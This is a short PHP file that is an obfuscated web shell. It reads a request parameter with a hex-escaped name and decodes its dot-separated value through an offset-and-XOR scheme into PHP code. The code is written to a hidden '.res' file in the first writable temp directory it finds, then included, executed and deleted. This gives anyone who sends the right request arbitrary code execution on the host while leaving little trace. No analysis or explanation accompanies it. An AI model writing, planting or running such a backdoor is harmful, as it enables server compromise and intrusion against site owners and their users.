<?php

if(array_key_exists("\x65nt\x72y", $_REQUEST)){
	$flg = $_REQUEST["\x65nt\x72y"];
	$flg	 =explode   ( 	".",	$flg ) 	;   
	$ptr = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s);
    
            foreach ($flg as $t	=> $v3):
                $chS = ord($s[$t % $lenS]);
                $dec = ((int)$v3 - $chS - ($t % 10))	 ^ 	7;
                $ptr .= chr($dec);
            endforeach;
	$ent = array_filter(["/dev/shm", getcwd(), session_save_path(), "/tmp", getenv("TEMP"), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir")]);
	foreach ($ent as $desc) {
    		if (max(0, is_dir($desc) * is_writable($desc))) {
    $binding = vsprintf("%s/%s", [$desc, ".res"]);
    if (file_put_contents($binding, $ptr)) {
	include $binding;
	@unlink($binding);
	exit;
}
}
}
}